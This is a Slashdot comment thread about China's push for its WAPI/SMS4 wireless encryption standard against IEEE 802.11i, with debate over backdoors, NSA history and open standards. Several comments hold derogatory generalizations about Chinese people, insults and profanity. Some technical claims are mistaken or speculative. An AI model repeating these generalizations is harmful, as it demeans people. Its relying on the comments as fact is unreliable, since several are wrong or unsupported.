China Frustrated In Encryption Talks

mikesd81 writes "According to an AP article, the Chinese are pushing for the encryption standard called WAPI. It's not going so well, as the majority of countries are taking the IEEE standard 802.11i. From the article: 'An international dispute over a wireless computing standard took a bitter turn this past week with the Chinese delegation walking out of a global meeting to discuss the technology. The delegation's walkout from Wednesday's opening of a two-day meeting in the Czech Republic escalated an already rancorous struggle by China to gain international acceptance for its homegrown encryption technology known as WAPI. It follows Chinese accusations that a U.S.-based standards body used underhanded tactics to prevent global approval of WAPI.'"

Maybe I'm too paranoid, but...

[damburger]

Isn't it possible the Chinese could be pushing an encryption standard because they know a flaw in it they can exploit?

Re:Maybe I'm too paranoid, but...

[prefect42]

But the US is too lovely and Christian to do the same?

Re:Maybe I'm too paranoid, but...

[ClamIAm]

Yeah, like all the backdoors the NSA put into SELinux...

Re:Maybe I'm too paranoid, but...

[Tom+Womack]

It is entirely conceivable, made more so by the enormous Chinese reticence to publish the SMS4 encryption algorithm they're using and to open it to international review.

AES versus a Chinese government-approved algorithm which you can only get a specification for by agreeing to partner with one of eleven Chinese firms is not a difficult decision.

Re:Maybe I'm too paranoid, but...

[damburger]

Oh, don't get me wrong - I don't trust the US government not to do the exact same thing. I just trust the CCP even less. Either way, I wouldn't entrust my privacy to any standard pushed by a government, as all governments are in the business of espionage. PS Is a random number generator moderating or something?

Re:Maybe I'm too paranoid, but...

That sounds serious and, by the way you speak, it seems that they are quite a few. Could you please mention at least one?

Re:Maybe I'm too paranoid, but...

[ClamIAm]

Hello.

Re:Maybe I'm too paranoid, but...

you should know that sarcasm doesn't pass through forum posts.

Re:Maybe I'm too paranoid, but...

[ronanbear]

Too paranoid is sorta an oxymoron on subjects like these.

In fairness, the Chinese could have a legitimate reason to want their own encryption standard: they own the IP on it. Down the road there could be quite large licensing costs on 802.11n devices. Since this would be an area where the chinese would have the same cost base (for export) it would have the effect of making chinese router exporters less competitive relatively speaking. They would both be funding their rivals and any cost savings they could make in manufacturing would make up a smaller proportion of the cost of the device.

The actual effectiveness (or lack thereof) of the encryption might be as irrelevant as it is in many standards conflicts.

Re:Maybe I'm too paranoid, but...

[Nested]

the Chinese could have a legitimate reason to want their own encryption standard: they own the IP on it.

Honestly, when have the Chinese ever given a shit about IP?

Re:Maybe I'm too paranoid, but...

[DNS-and-BIND]

Uh...licensing costs? They just steal it. It's standard operating procedure. Seriously.

Just this weekend, I was at the local expo at my city here in China (I'm an expat). I open up their little guide magazine that comes with the gift bag and city map. Inside, I find content ripped off directly from my own website (I run the local English-language city guide). It's stuff that I wrote, and the freaking government copied it. Of course, there was no use complaining - what am I going to do, sue?

Re:Maybe I'm too paranoid, but...

[michael_george]

>Hey,
>
>At least this Christian country, called the USA, which you so obviously despise, doesn't shut Google down for an entire two weeks without explanation.

Oh, get off your high horse. So obviously a true Christian country wouldn't use 'rendition' to torture information from prisoners either, now would they?

Re:Maybe I'm too paranoid, but...

I don't know if you remember, but the US recently voted down Net Neutrality. Shutting down Google for a couple of weeks won't be much compared to allowing private companies decide what you can and cannot see...

Re:Maybe I'm too paranoid, but...

Does the standard use characters useable in the Chinese language ?
ASCII for example would be useless.
for example : An encrytption string using an English alphabet could anger them culturally and they see it an 'Not neutral'
  The chinese may want to see characters that can render chinese

Re:Maybe I'm too paranoid, but...

[WiJO]

The Chinese care about IP when it's their IP. They give tacit approval to those who pirate others intellectual property, but they will not stand for anyone taking theirs.

Re:Maybe I'm too paranoid, but...

They will probably reject Unicode as well.
The issue may be that it's simply not their design and nothing more .

Re:Maybe I'm too paranoid, but...

[mrchaotica]

They have to legitimately pay for licenses on anything they manufacture and import into the US. The grandparent poster's theory is that they want to give their router manufacturers a competitive advantage, because otherwise they have to pay the same license fee as everyone else and can't undercut the competition as much.

Re:Maybe I'm too paranoid, but...

[iariar]

maybe china just wants to regain some credibility in science / technology matters by having their standard adopted. http://www.seedmagazine.com/news/2006/05/scientifi c_copy_cats.php

Re:Maybe I'm too paranoid, but...

It's got nothing to do with the US being better than China - the Chinese delegation is trying to portray it as a national issue, but actually it's about open standards. 802.11i is a published, peer-reviewed standard based on published, peer-reviewed encryption algorithms. In fact the driving force behind 802.11i is the flaws that were found in 802.11b by people outside the IEEE. If 802.11b had been a closed-book standard like WAPI, those flaws would still have existed but they might never have been made public.

Re:Maybe I'm too paranoid, but...

Then, make your own encryption algorithm. Let's see whether it can stand some hacking.

Re:Maybe I'm too paranoid, but...

And I guess that's the problem with you and the rest of the ignorant Americans. You think you know how other countries should be run, but you can't even run your own.

Enjoy the police state.

Re:Maybe I'm too paranoid, but...

[Kadin2048]

Don't be naive: just because the Chinese don't play by the rules domestically says nothing about whether they will expect other people to play by them with regards to their IP.

I fully expect that if their product was made the standard, and some Western nation started ripping it off without paying the licensing fees, the PRC would throw a full-on diplomatic/economic hissy fit. In exchange for royalties, they would agree to consider, in principle, someday, perhaps soon, to appoint a minister to draft a paper on the creation of a committee to enforce and respect other nation's IP within the Chinese domestic market. Or they'd make some noises and arrest some (preferably Western) person for making bootleg DVDs, and then forget about it until the next time trade negotiations roll around.

That's how they do business. Seems to be working for them, though.

Re:Maybe I'm too paranoid, but...

[wrook]

I just want to point out:

It's not stealing, it's infringing.

And it may not even be infringing because China is not a member of the Berne convention. They do not have copyright in the way that western countries do. I'm not overly familiar with Chinese laws, so I don't know if what they do is illegal. But I suspect not.

As an expat in a foreign country, you should be aware that there are foreign laws.

Re:Maybe I'm too paranoid, but...

[Pink+Tinkletini]

It can, but apparently everyone on Slashdot is autistic. Who knew?

Re:Maybe I'm too paranoid, but...

[Fordiman]

My GOD, but you sound like Jeffry Rowland's 'the Englishman'. I'm having difficulty taking you seriously.

I think this particular sentiment is hilarious in its nature. We have a population and land mass at least as big as any european country - per state. Yes. Our country has problems. It comes from having to manage a LOT more counrty than yours does. So yeah, you provincial fuck, shove it up your ass.

As for thinking how other countries should be run - well, not so much. We suggest capitalist democracy, as that tends to place control, at least in the early stages, in the hands of the citizenry. No, I don't exactly trust a communist government. I'll deal with a socialist government; at least the government's just redistributing resources at that point, but I'm not a fan of 'the government owns everything'. Absolute power and all.

Can't run our own? Been doing it for over 200 years, and despite our issues, are still the number one economic force in the world. I'm not saying we're doing a spectacular job, but honestly, being the best country in the world is like being the valedictorian of summer school.

Police state? Yeah. You're clever. No, seriously, what police state? The one in which we have standards formed by the IEEE? 'cos last I checked, the 'I' stood for 'International'. Not that the wireless standard we use is in any way related to ourpolice statiness.

Re:Maybe I'm too paranoid, but...

He's aware.. he has no problem selling Chinese crap on his website.

Re:Maybe I'm too paranoid, but...

[/ASCII]

While I am worried about net neutrality, your description of a future with no net neutrality is rather unrealistic.

If an internet provider would try to blacklist, or even seriously downgrade the bandwidth to any of the popular sites on the internet not willing to pay for the extra bandwidth, then that provider will lose a _lot_ of customers.

Re:Maybe I'm too paranoid, but...

Put some misteaks in your website just to embarass them.

Re:Maybe I'm too paranoid, but...

[liak12345]

You people have more paranoid delusions than Stephen King on crack.

Re:Maybe I'm too paranoid, but...

[Fordiman]

*blink*

You obviously don't understand encryption.

It's just numbers. 0-255 or 0-65535, it doesn't matter. You convert a block of data to a VERY long number, run the encryption algorithm on it, and convert it into a transport-friendly charset (like base 64 for email, or binary for TCP/IP). The password is the same - whatever charset its in, it just gets converted to a number. Now, slap on top the fact that your comment is MEANINGLESS when applied to what should be a transparent network layer, and I fail to see why you should be allowed to multiply.

Re:Maybe I'm too paranoid, but...

[Threni]

> Too paranoid is sorta an oxymoron on subjects like these.

Uh..it's not, unless you can somehow demonstrate that "too" and "paranoid" are in some way contradictory.

Re:Maybe I'm too paranoid, but...

[utnapistim]

It's the same story that happened when DES algorithm appeared:

They created a set of values to be used for the S and P values and when they submited it to the NSA, they got back the S and P values completely changed.

It couldn't be proved that the new values were unsafe to use and both the creators and the NSA argued they'd rather use their values because the other party could have known some weak point in the values they offered.

I think it's the same, all over again.

Re:Maybe I'm too paranoid, but...

[longbow486]

thats exactly why the chinese are trying to get it aprroved, so that they can get into everyones information, when they all think it is secure, yet its not. fucking chinese, think before you try and get a standard approved that is known to have a flaw in it

Re:Maybe I'm too paranoid, but...

[newt0311]

jeez, from my perspective, the parent is right. encryptions are algorithms which transforma set of numbers without loosing data. To do this, they use mathematical arelationships. if your give everybody a binary algorithm and all it does is add one, that is clearly a vulnerability. The back door in the algorigthms the chinese proposed is not going to be simple but it may very well be there. I am not saying that WAPL has a back door but the anonymous coward has made a valid point here which deserves consideration. Now your reproductive ability. With that lack of knowledge and arrogance I doubt you would ever manage get anybody of the opposite sex to reproduce with you.

Re:Maybe I'm too paranoid, but...

[WhiteWolf666]

You can't license WAPI.

WAPI is only avaliable for Chinese manufactures.

In trying to make WAPI the international standard for Wireless Encryption, China is trying to position itself as the defacto manufacturer for all wireless devices, software and/or hardware.

This is not going to work.

Re:Maybe I'm too paranoid, but...

[WhiteWolf666]

Actually, the I stands for "Institute", as in Institute of Electrical and Electronics Engineers, Inc.

Re:Maybe I'm too paranoid, but...

[tutori]

Correct me if I'm wrong, but I remember reading somewhere that it was found that the NSA's values were better against certain attacks unknown to the 'public' at the time of DES' creation. Of course, this doesn't mean that you can now trust the NSA completely, only that they dealt truthfully about this in the past.

Re:Maybe I'm too paranoid, but...

[Sexy+Commando]

Maybe you should check out GB18030

Re:Maybe I'm too paranoid, but...

[Urusai]

Unpublished encryption algorithms aren't.

Re:Maybe I'm too paranoid, but...

[Schraegstrichpunkt]

Yes, it's possible, but it isn't necesary. The bottom line is that China is basically saying, "It's secure, trust us", which is an argument that was dismissed by the security community decades ago.

Re:Maybe I'm too paranoid, but...

[1u3hr]

As for thinking how other countries should be run - well, not so much. We suggest capitalist democracy

You've got a century of installing and propping up dictators to live down. Recall Pinochet? Diem? Marcos? The Shah? Against that you've got Japan and Germany, but it's a mixed bag.

Re:Maybe I'm too paranoid, but...

Uhh... we were kind of busy fighting the commies at that point in time. Hence the propping up of dictators. Maybe wasn't the best solution but to our point of view a dictator that answered to us was far better than the commies taking over a country.

Re:Maybe I'm too paranoid, but...

Why on earth is this comment about the "lovely US" score:4 insightful? It demonstrates no process of analysis on the part of the poster. 3rd graders can compare and contrast major political powers better than this. How about score:1 Laziness.

Re:Maybe I'm too paranoid, but...

[Nykon]

You hit it right on the nose. Mod his comment up people! :)

Re:Maybe I'm too paranoid, but...

[layer3switch]

Look, there is no "I" in Team or International or Institute... oh wait... it sounded clever 5 minutes ago... Oh, I hate karma...

Re:Maybe I'm too paranoid, but...

Go back before the US publishing industry started, and America did exactly the same thing.
IP is only important when _you_ have something to lose.

Re:Maybe I'm too paranoid, but...

[Fordiman]

"jeez, from my perspective, the parent is right. encryptions are algorithms which transforma set of numbers without loosing data. To do this, they use mathematical arelationships. if your give everybody a binary algorithm and all it does is add one, that is clearly a vulnerability. The back door in the algorigthms the chinese proposed is not going to be simple but it may very well be there."

You make very good and valid points - none of which are applicable to GP's comment. He was talking about language, which has nothing to do with security. In other words, my comment boils down to: 'no the chinese weren't complaining about everything being in english; the language doesn't come into that layer of encryption.'

"With that lack of knowledge and arrogance I doubt you would ever manage get anybody of the opposite sex to reproduce with you."

My 'lack of knowledge' was at least enough to read what you were attempting to defend.

(Now, this is slashdot, so no remorse on the bad grammar; tut, tut)

As for my lack of arrogance, I thank you. ...

Oh, you meant it the other way. Ok. Ahem. Plenty of stupid humans with balls the size of melons reproduce. It's very likely the way you came about.

Yeah. There's very good justification for my sig. Especially when I'm in a bad mood.

Re:Maybe I'm too paranoid, but...

[Fordiman]

Sorry, read the sig. Not giving a damn.

Re:Maybe I'm too paranoid, but...

How does "number one economic force in the world" turn into "being the best country in the world"? The two have nothing to do with each other as far as I'm concerned. The US has one of the lowest standards of living among the industrialized world, and has some of the lowest quality of life measurements.

Re:Maybe I'm too paranoid, but...

[DNS-and-BIND]

Actually, the introduced some mistakes of their own. No kidding.

It all turned out well, though. I talked to a government official who actually speaks English, and he sympathized with my plight. He invited me for dinner on Friday! (being invited to dinner with a Communist government official is a huge deal in China)

Re:Maybe I'm too paranoid, but...

someone is going to suddenly go missing.

It boils down to...

[QuietLagoon]

...who can crack whose encryption.

The Chinese want their encryption to be the standard so that they can use their backdoor.

The US wants its encryption to be the standard so they can use their backdoor.

Re:It boils down to...

[DirtyHarry]

Well, then Id opt an European Encryption.

Re:It boils down to...

[lurvdrum]

In which case all one has to do to be secure is to encrypt using the Chinese standard, then re-encrypt using the US standard. I can't see the Chinese and the US sharing their backdoors!

Re:It boils down to...

[damburger]

On what basis are European governments more trustworthy in this regard than the Chinese or US governments?

It is never a good idea to trust technology supplied to you by people with a vested interest in spying on you.

Re:It boils down to...

[klmth]

The algorithm selected for AES was originally called Rijndael, and was developed by two Belgian cryptographers.

Re:It boils down to...

On what basis are European governments more trustworthy in this regard than the Chinese or US governments?

On basically every basis.

Re:It boils down to...

[ynohoo]

The level of independence of the member states helps. Since they don't trust each other, they are more likely to come up with an acceptable standard. While there are reasonable levels of co-operation between their respective security services, there is no top level organisation comparable with the NSA or the Chinese equivelent.

Re:It boils down to...

[damburger]

It may seem like the EU member states get on like cats in a sack, but that only tends to go so far as cultural and economic competition. Violating the privacy of European citizens in the collective interests of every EU government.

This might be getting into tinfoil hat territory, but given that it is possible to encrypt your sensitive data before sending it over a network in most cases, would you really want to take a chance?

Re:It boils down to...

The US wants its encryption to be the standard so they can use their backdoor.

The I in IEEE stands for International. 802.11i is an internationally ratified standard and China is pushing its own unpublished "standard". The chance of there being a deliberate back door in 802.11i is about as high as the chance of that the head of the MPAA will issue a personal apology to the Pirate Bay admins and buy them new servers.

Re:It boils down to...

[hengist]

The I in IEEE stands for International.

It stands for Institute.

Re:It boils down to...

[powerlord]

While there are reasonable levels of co-operation between their respective security services, there is no top level organisation comparable with the NSA or the Chinese equivelent.

Thats only what they want you to think. ;)

Re:It boils down to...

[QuietLagoon]

I would have mod'd my message as funny.

Re:It boils down to...

[KDR_11k]

Because the courts of the EU wouldn't like a single exploit as that'd be fostering monopolies so they'd force everyone to ship the product without exploits and ask the user to get his preferred exploit from a variety of competing vendors.

Re:It boils down to...

[/ASCII]

The proper solution is to use a multipass encryption. First encrypt using the chinese standard, then re-encrypt using the american one, the beligian one, the iranian one, etc. That way, you'd need to know a backdoor to every encryption scheme used to access the data. Only a minuscle number of quintuple-agents would know all the backdoors, and they can't use this knowledge out of fear of compromising themselves.

Re:It boils down to...

But you can't spell Internetionel without IEEE. Er..

Re:It boils down to...

[kabocox]

Um, so include both, that way the Chinese and US governments would have to agree before using both sets of backdoors to get into that info. For minor privacy issues, that should be "good enough". The few things that I could envision the US and Chinese governments agreeing on something, I'd really, really hope that they actually have a backdoor to use though. What's it really matter to slashdot anyway? Don't we use our own set of encryption on top of the built-in encryption? That just makes sense.

Re:It boils down to...

[Schraegstrichpunkt]

The proper solution is to use a multipass encryption.

While that might work, there is no guarantee that you'd actually increase your security by doing so.

Re:It boils down to...

They probably had it confused with the ITU, where I'm reasonably sure the I stands for international.

That said, IEEE is pretty international, last I recall. Of course, I was only a member of it for a little while before I changed majors *shrug*

No current implementation?

[LinuxGeek]

From Wikipedia:

The WAPI standard requires the use of a symmetric encryption algorithm[1], SMS4, which was declassified in January 2006. The standard and its cryptographic implementation remain unpublished.

So the Chinese are pushing for a standard that no one can currently verify as being secure and then they get angry?

Re:No current implementation?

[RareButSeriousSideEf]

...and, uh, symmetric?

For quite a few applications, that's enough to deep six SMS4 right there.

Presuming an area full of sniffers, is there much doubt as to the safer choice between published asymmetric and unpublished symmetric?

It's nice that people worry so much about them getting into a snit & walking out of a meeting. I mean, it's not like anyone could just go ahead & make decisions without their input, could they?

Re:No current implementation?

[execute85]

AES is symmetric too (as was DES before it). Although asymmetric is "stronger", it is very slow. So usually you use asymmetric encryption to negotiate a symmetric key for the communication session. This is what SSL does and it's considered secure (in 128 bit symmetric mode).

Re:No current implementation?

[Abcd1234]

Indeed. And I would argue with the idea that asymmetric ciphers are inherently "stronger". In the end, the strength is in the algorithm used combined with the key size chosen. The two models exist because they fill different roles, not because one is inherently better than the other.

Re:No current implementation?

[Schraegstrichpunkt]

Not only that, but encrypting with raw RSA is considered to be very insecure, mainly because of RSA's commutative property.

wireless encryption

[56ker]

There are already at least two wireless encryption formats I can think of. I don't see why adding a third is a problem. As China's economy is very much export-driven I can see how they'd be frustrated if the US attempted to thwart them getting their standard adopted as an international one.

Re:wireless encryption

[LinuxGeek]

See my message above yours. The Standard has not been published after being declassified in January 2006. No published code or theory of operation is available to you, me or 6 billion other people to verify that it is secure or that the spec may be secure but the reference source code may have serious bugs that effect the security. Maybe now you can "...see why adding a third is a problem..." and China knows very well why the standard is being rejected by other intelligent nations right now. It dosen't mean that it can't be a standard in the future, just not right now.

China also seems to be in love with the idea of the central server verifing the security between the client and AP. Centralized key serving scares me even when the implementation is known to be secure. The key servers in China will be controlled by whom?

Re:wireless encryption

[56ker]

Yes but I would've thought that from the Chinese perspective the above makes it easier to protect what they probably view as a trade secret. I can understand them being unwilling to accept a standard that isn't properly defined.

China likes control in a lot of areas - take their censoring of the internet as a example. However the centralized server hopefully would rule out any "piggy in the middle" attacks where an attacker pretends to be the AP in an attempt to fool the client.

Re:wireless encryption

[mrchaotica]

Are you kidding, or just stupid? The "centralized server" would be a built-in "piggy in the middle!" That's not just unacceptable, it's absurdly so!

Re:wireless encryption

[56ker]

OK as I'll reword what I wrote in an attempt to explain it better. Without the centralized server an attacker can spoof the access point in order to fool a client. If a key from a centralized server is also required it requires an attacker to both spoof the access point and to get the key from the centralized server (hopefully a more difficult task). Yes the centralized server leads to security concerns (eg the keys from it could be used to decrypt the encrypted traffic). However AFAIK the centralised server would be run by some trusted company (say in a similar way to the SSL certificates being signed) which would require law enforcement to follow a process (eg search warrant) before handing any keys over.

The only downside would be if the traffic was only encrypted with the key from the centralised server. If a combination of the centralized server's key and the access point's key was used it would make it more secure than the current system is (depending on the encryption scheme used).

Re:wireless encryption

[mrchaotica]

The only secure means of key exchange is outside the system, e.g. in person. I'd prefer typing the key (or passphrase) in manually instead of using a centralized server any day!

Re:wireless encryption

The Standard has not been published

This paper is linked from the Wikipedia SMS4 talk page. I have no idea what it says (besides SMS4 in the title).

Re:wireless encryption

[ralmin]

The paper you linked to (http://www.oscca.gov.cn/UpFile/200621016423197990 .pdf) describes a cryptographic algorithm called SMS4, and includes several lookup tables. It's not a reference implementation but there are some examples given. I don't have time to attempt a full translation now, but perhaps someone else can help out.

The title is "The SMS4 encryption algorithm used by wireless local area network products"

The introductory paragraph says "This algorithm is a block algorithm. The algorithm's block length is 128 bits, and the key length is 128 bits. The encryption algorithm and the key expansion algorithm both use a 32-turn non-linear iterative structure. The structure of the decryption algorithm and the encryption algorithm are similar, just the order of use of the turn keys is opposite; the decryption turn key is the reverse order of the encryption turn key."

(Chinese is not my native language; I probably got some technical terms wrong. Especially "turn key", I don't know what that is!)

Simon.

Re:wireless encryption

[Alsee]

I don't know any Chinese, but I have a passing familiarity with English Crypto-terminology.

I am pretty confident that each instance of "turn" should be translated as "round". The encryption is done in 32 rounds using a different key for each round. Decryption is the same as encryption, except that you use the round keys in reverse order.

-

censorship

[kdougherty]

I'm not trying to be negative, especially towards China... However, I would never accept a security concept from any government that filters and censors their country's internet. Seems like an oxymoron to me.

Re:censorship

[Silver+Sloth]

How about one which monitors it's citizens telephone calls, or insists that it's ISP's hand over surfing details? I don't trust the Chinese either, but they're not the only villains on this stage.

Re:censorship

[LinuxGeek]

Exactly! A government that dosen't trust it's own people wants the world to trust it to make secure encryption with no published standards and trust that there are no back doors or flaws. And then to trust them to run the Chinese central key servers securely too. If there are serious flaws that they want to take advantage of, then it would seem logical that they would want to make WAPI mandatory (in China at least) too.

That is asking for a lot of trust from the rest of the world.

Re:censorship

[swb]

I don't trust the Chinese either, but they're not the only villains on this stage.

That's kind of like saying because I've played catch with a baseball, I should be judged among the NY Yannkees.

Even if you add up all the villainy of the U.S. government over the last 55 years -- COINTELPRO, MKULTRA, NSA eavesdropping, and virtually everything the Bush administration has proposed, it still doesn't come close to the Chinese level of villainy.

Even if Tiananmen Sqaure was the only oppressive, murderous thing the Chinese have ever done -- and it isn't -- they would still be in a category of oppression and dictatorship that has only Stalinist Russia and Nazi Germany as peers.

The thing that frustrates me the most about the Bush Administration's "War on Freedom" isn't so much the invasion of privacy or the possible usurption of the constitution (although they are infuriating), it's the global and internal notion that we now have achieved some kind of oppression parity with the Chinese. When I hear this, I know it's just ignorance talking, but it still drives me mad that a level of snooping that's not even in the same league as every day corporate data mining or desktop spyware suddenly has people believing the U.S. government steals pages from Mao's playbook.

Re:censorship

[Spliffster]

However, I would never accept a security concept from any government that filters and censors their country's internet. Seems like an oxymoron to me.

how about one which still has death penalties?

Re:censorship

[Kadin2048]

Thank you and well said.

I think that, particularly here on Slashdot, but also among people of a certain demographic and political orientation in general, we risk sometimes losing sight of the forest for all the trees. That is to say, we're so aware of and infuriated by the relatively minor invasions of our privacy by our government here in the U.S., that we fail to put it in perspective and see that there are many places on this planet where the level of government interference in a private citizen's life is far, far worse -- and that this level of interference isn't even seen as problematic: it's just taken for granted as a fact of life.

People need to back off on the Daily Kos rhetoric from time to time and realize that the NSA is not (yet) running a Great Firewall, Gitmo is not a re-education center that you can get sent to for dissing the wrong Senator in your blog, and that the Bush administration -- regardless of how bad you may think they are -- does not massacre Democrats in the street, or run them over with tanks.

That is not to say that we should be complacent, or ignore the things that are going on in this country, but when having a discussion about oppression overseas, some perspective is necessary. I can only imagine that to people actually living under repressive governments, that the discussions and rhetoric from the U.S. about things like phone company call logs seem pretty ridiculous.

Re:censorship

[KDR_11k]

Well, I'm glad the IEEE isn't a government, then.

Re:censorship

[Fordiman]

Dunno. You've been accepting it for years.

Re:censorship

[bmajik]

I was thinking of posting something like this. Something like "I am sure the Chinese spec has monitoring backdoors in it known only to the Chinese govt". I'd say this because I'd be implying that whatever the US is in favor of wouldn't have such drawbacks.

Except I don't think it's reasonable to think or say such a thing in light of recent events in the US, which is a shame.

If China Does Not Like It. . .

[Apple+Acolyte]

. . . then China does not have to accept the standard for its domestic routers, right? What's the big deal?

Re:If China Does Not Like It. . .

[backwardMechanic]

Selling stuff. Why restrict yourself to your home market when you can sell to the whole world? You've gotta think big.

I trust neither

[Opportunist]

I trust neither China nor the US to provide me with an encryption standard that protects my privacy. Neither government is known for their fondness of people's privacy.

If anything, a free and most of all open standard could win my heart. But as long as governments are involved, who have an inherent interest in snooping, I will not rely on their security only and use encryption that is under MY (or at least that of about a billion flaw-seekers worldwide) control.

Re:I trust neither

[Danathar]

Umm..ok...the ISO/IEEE are not U.S. government. They get one vote like every other member.

Re:I trust neither

[NitsujTPU]

Mmmmph. Such a standard would be openly published, for anybody to inspect. It would, in fact, be an open standard. That's why we have standards.

Re:I trust neither

[kestasjk]

It's always a possibility that Rijndael was chosen because the NSA noticed a vulnerability in the algorithm which the rest of the cryptanalyst community hasn't found, but it does seem (vanishingly) unlikely.

I trust Rijndael with my data for now, I've yet to see a good reason not to. Just because the NSA decided to adopt it doesn't make it vulnerable. The NSA adopted Linux too, does that make Linux vulnerable?

Re:I trust neither

[gkhan1]

Yes exactly! The NSA also developed the SHA hashing algorithms, and they are great even though there might be some trouble with SHA-1

Re:I trust neither

[dpilot]

I seem to remember some old stories about the NSA and the DES standard.

The NSA pushed for a few changes in the standard, without divulging the reasons. Some thought it was to insert a backdoor or vulnerability. Years later, after the outside world developed more crypto expertise, the found that the NSA had actually closed a vulnerability that nobody else even knew about. If the NSA had a backdoor into DES, it was with hardware that could brute-force it.

Re:I trust neither

[Chandon+Seldon]

It's interesting to note that Rijndael was probably the weakest of the AES finalists.

Re:I trust neither

[cygnusx]

> I will not rely on their security only and use encryption that is under MY control

Actually, if 'they' really wanted to get your secrets and the benefit of doing so outweighed the risks of not following due process, they could and quite easily. Van Eck phreaking, surreptitious keylogger insertions when you aren't home, traffic analysis -- there are plenty of ways to get even encrypted secrets out.

And remember all of these techniques are also available to anyone interested enough in the private sector (organized crime, typically).

Re:I trust neither

[klmth]

Which certainly doesn't say a lot. All five finalists were solid designs. AES was chosen because it was fast to implement inboth software and hardware.

Re:I trust neither

[Pale+Dude]

That is one clever piece of NSA-misinformation. Fairly standard for NSA though. And you bought it.

Re:I trust neither

[Kadin2048]

Such a standard would be openly published, for anybody to inspect. It would, in fact, be an open standard. That's why we have standards.

So ... basically ... like 802.11i, the proposed standard by the IEEE, and AES, which is at its core? And not like the Chinese standard?

You can download the IEEE spec here: http://standards.ieee.org/getieee802/download/802. 11i-2004.pdf. You're not allowed to modify or distribute it, and the IEEE retains copyright, but you can download, read, inspect, and archive it. That's a lot more than I can say about the Chinese version.

Information on AES can be had directly from the NIST (http://csrc.nist.gov/CryptoToolkit/aes/rijndael/R ijndael-ammended.pdf).

Re:I trust neither

[Kadin2048]

Actually, it makes perfect sense: it in fact makes more sense than the backdoor explanation ever did, or does. The NSA made changes to the algorithm, which obviously made a lot of people suspicious (if they had wanted to backdoor it, why be so obvious about making changes? Why not just plant a compromised algorithm from Day 1 and play dumb?); more suspicious was their lack of information about the changes. In retrospect, they couldn't say anything about the changes because it had to do with a method of cryptanalysis that wasn't widely known at the time. Again: if their goal had been a back door, why patch it and arouse suspicion? They could have just kept quiet and had a thoroughly backdoored algorithm for a few years.

The answer is that the NSA isn't as one-sided a domestic spying institution as the tinfoil-hat crowd likes to believe it is. They are also quite interested -- far more interested, in my opinion -- in intelligence-gathering internationally, but also in the denial of intelligence to foreign countries. Thus, it is consistent with their mission to keep the U.S. from adopting as its encryption standard (which is used for many sensitive diplomatic functions, including secure telephones and the like) something that's easily broken. And it's consistent with the somewhat paranoid mindset of the intelligence community to assume that if we can break an encryption scheme, than our enemies probably can, also. So therefore it would make sense for the NSA to patch all known vunerabilities in AES, to the best of their ability, because of the probability that any backdoor would be exploited by an unknown third party to the disadvantage of the U.S.

Moreover, even if -- as you suggest -- the whole fixing of AES really was an elaborate ruse designed to cover for the insertion of a backdoor, it would make the backdoor so valuable of an asset as to basically preclude its routine use. Because of the fix, eyes will always be on the NSA and AES: if informtion started to filter out that could only have come as a result of an AES break (or even if the information could have been obtained from an AES break) it would destroy that source: the sort of people the NSA wants to monitor would stop using AES immediately. So even if the NSA does have a backdoor, the situations where a person or organization would have to be concerned about it being used are very small. (E.g., the NSA is not going to risk compromising their backdoor, if they have one, in order to blow the whistle on your tax evasion / marital infidelity / porn collection / etc. In fact the intelligence value of such a source might even outweigh its use to stop a small-scale terrorist attack.)

Re:I trust neither

[Surt]

http://www.schneier.com/blog/archives/2004/10/the_ legacy_of_d.html

Of course, this assumes that Bruce Schneier is not an NSA stooge.

Re:I trust neither

[StikyPad]

Well, at some point you've got to trust someone. How do you know the free and open method wasn't developed by a foreign government, your own government, or anyone else who already knows its weakness and can exploit it? And what better way to get millions of people using your product than to introduce it as a new public standard? Are you going to review the algorithms and mathematical theory behind them, or will you just assume that someone else will? From your "few billion flaw-seekers" statement, I will infer that you're expecting someone else to do the legwork. Really, I'd be surprised if more than a handful of people do a thorough analysis, and that analysis isn't likely to be any more or less revealing for an open standard than a closed one, especially if the researchers don't have the particular insights, knowledge, or access to technology that the author does.

If you're really dealing with information so secure that you can't afford risking any amount of interception or infiltration, you should be using one time pads or the like, rather than relying on protections which are inherently weak against MITM and good old-fashioned brute force.

Anyway, we're talking about wireless newtworks here. If you're using a wireless network to begin with, you're already accepting a huge risk for the sake of convenience. I'm not saying the standards bodies shouldn't take reasonable precautions to protect against known attacks, to the extent possible, but you're still broadcasting information that can be intercepted by just about anyone. If you're comfortable doing that, then the author of your encryption shouldn't be that much of a concern.

Re:I trust neither

[BrianTung]

The point is that you don't have to trust the U.S. government in the case of AES. AES is a subset of Rijndael, whose entire specification is wide open (and not developed by the U.S., for that matter). You can verify for yourself that it is robust, or get someone you trust to do it for you, if you lack the expertise. You'd have to do that anyway with any algorithm.

In fact, I suspect that if the U.S. government (or at least, the NSA) wanted to snoop on you, they would only be too happy to let you pick your own encryption system. Chances are good it would be less resistant to snooping than AES. Of course, if you don't care about performance, you could always choose 3DES, which has been poked at for quite a while. But--oops--that's based on DES, which also was developed by the U.S. government (although it is loosely based on IBM's Lucifer).

Re:openssl?

[zootm]

I'm not any sort of expert, but I believe that OpenSSL is an implementation of an existing standard, whereas the things up for debate here are the next-generation standards to use. Furthermore, these standards are for wireless connections, which isn't something that OpenSSL has anything to do with.

So basically, it's not relevant, I'm afraid.

"Christian"? WTF?

Since when is the USA a "Christian" country? Have Falwell and his Taliban finally taken over your government completely? Sorry to hear that; it seemed like a reasonably nice place while it lasted.

Re:"Christian"? WTF?

Yes, at the moment the US is run by the christians. They will burn you out of your house if you are not a christian. I know this second hand.

Re:"Christian"? WTF?

"God bless America". Norway had a priest as a prime minister, but even he knew bether than speaking about God in his speaches as the prime minister.

Few things make me more angry than a American president using those words when he would like to torture, kill and rape the world.

Re:"Christian"? WTF?

[Loquax]

Two quick comments-- 1) The USA is not run by Christians. It is run by Capitalists who often use Christianity as a cover.

2) By the very definition of Christian (do unto others..., Love your neighbor as yourself..., love your enemy, etc.) anyone who would burn a person out of their house is NOT a Christian. Just like anyone who would commit a suicide attack on innocents (or suicide in general) is NOT acting within the bounds of Islam and are NOT Muslim.

One final thought. I'd much rather trust a person of religious faith (any faith for that matter) that says there is more to this world than what we see and that there is an absolute mandate to be spiritually "good" than I would trust a philosophy that says that the material world, run by materialistic rules, is all that there is (this includes both Capitalism and Communisim).

Re:"Christian"? WTF?

[Loquax]

